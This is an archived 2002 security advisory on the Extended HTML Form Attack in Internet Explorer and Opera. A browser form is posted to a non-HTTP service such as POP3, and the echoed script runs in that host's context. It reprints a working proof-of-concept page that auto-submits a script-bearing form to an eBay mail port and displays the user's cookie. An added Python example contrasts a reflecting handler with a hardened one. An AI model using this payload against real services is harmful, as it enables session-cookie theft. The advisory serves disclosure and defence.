
Internet Explorer (and Opera) vulnerable to the Extended HTML Form Attack
8th Feb 2002 [SBWID-5079]
COMMAND

	IE (and Opera) vulnerable to the Extended HTML Form Attack

SYSTEMS AFFECTED

	 Internet Explorer 6 and older versions

	 Opera 6.0 and older versions

	

PROBLEM

	From the advisory by Obscure [http://www.eyeonsecurity.net]:
	

	Many web browsers such as Internet Explorer allow forms to be  submitted
	to non-HTTP services. Some non-HTTP services echo back  the  information
	sent, and the web browser renders the echo as an HTML  page,  regardless
	of the protocol behind the service.
	

	A malicious user can create a form which  is  submitted  by  the  victim
	(automatically  using  Active  Scripting  or   manually   using   Social
	Engineering). This form can  cause  a  non-HTTP  service  to  echo  back
	JavaScript commands which in turn allow the malicious user to steal  the
	cookie for that domain. There are more uses for this attack, other  than
	just stealing cookies.
	

	More on this :
	

	http://eyeonsecurity.net/papers/ - Extended HTML Form Attack

	

	

	 Sample exploit [http://eyeonsecurity.net/advisories/showMyCookie.html] :

	

	<html>
	<head><title>Extended HTML form attack demo- obscure</title></head>
	<body>
	Legal Notice: <br>
	This Advisory and Demonstration is Copyright (c) 2001 Obscure. You may distribute it unmodified. You may not modify it and distribute it or distribute parts of it without the author's written permission. 
	<p>
	Disclaimer: <br>
	The opinions expressed in this advisory and program are my own and not of any company. 
	The usual standard disclaimer applies, especially the fact that Obscure 
	is not liable for any damages caused by direct or  indirect use of the information or functionality provided by this advisory or program. 
	Obscure, bears no responsibility for content or misuse of this advisory or program or any derivatives thereof. 
	<p>
	if you have JavaScript on you do not need to click on submit. This example will only show your cookie for Ebay.com.
	<script>
	window.open("http://www.ebay.com","w");
	setTimeout("form1.submit()",300);
	</script>
	<form name="form1" method="post" action="http://thompson.ebay.com:110/" enctype="multipart/form-data">
	  <textarea name="eostest">
	user <script>alert(document.cookie)</script>
	quit
	  </textarea>
	  <input type="submit" value="Submit">
	</form>
	</body>
	</html>

	

SOLUTION

	None yet.
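
	Added example, not part of the advisory or any vendor's code: a toy POP3-like line handler in Python that shows the echo behaviour described under PROBLEM next to a variant that never reflects client input and ends the session when it sees an HTTP request line. The handler functions, their reply strings, the host name and the captured bytes are all constructed for illustration.

```python
import re

# Constructed sample: roughly what a browser writes to the socket when a
# multipart form is posted to a mail port (headers abbreviated, host made up).
BROWSER_BYTES = (
    b"POST / HTTP/1.1\r\n"
    b"Host: mail.example.test:110\r\n"
    b"Content-Type: multipart/form-data; boundary=----x\r\n"
    b"\r\n"
    b"------x\r\n"
    b'Content-Disposition: form-data; name="eostest"\r\n'
    b"\r\n"
    b"user <script>alert(document.cookie)</script>\r\n"
    b"quit\r\n"
    b"------x--\r\n"
)

HTTP_REQUEST_LINE = re.compile(rb"^(GET|POST|HEAD|PUT|OPTIONS) \S+ HTTP/\d\.\d$")


def naive_session(data):
    """Hypothetical POP3-like toy that repeats client text in its error replies."""
    out = [b"+OK ready"]
    for line in data.split(b"\r\n"):
        verb, _, arg = line.partition(b" ")
        if verb.upper() == b"QUIT":
            out.append(b"+OK bye")
            break
        elif verb.upper() == b"USER":
            out.append(b"-ERR unknown user " + arg)      # reflects client input
        else:
            out.append(b"-ERR unknown command " + line)  # reflects client input
    return b"\r\n".join(out) + b"\r\n"


def hardened_session(data):
    """Same toy: fixed replies only, and an HTTP request line ends the session."""
    out = [b"+OK ready"]
    for line in data.split(b"\r\n"):
        if HTTP_REQUEST_LINE.match(line):
            return b"-ERR protocol violation\r\n"  # nothing else is sent back
        verb = line.partition(b" ")[0].upper()
        if verb == b"QUIT":
            out.append(b"+OK bye")
            break
        out.append(b"-ERR authentication failed" if verb in (b"USER", b"PASS") else b"-ERR unknown command")
    return b"\r\n".join(out) + b"\r\n"
```

	The naive handler returns the script tag verbatim, which is the text a browser would then render in the context of the service's host name; the hardened one returns only constant strings.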
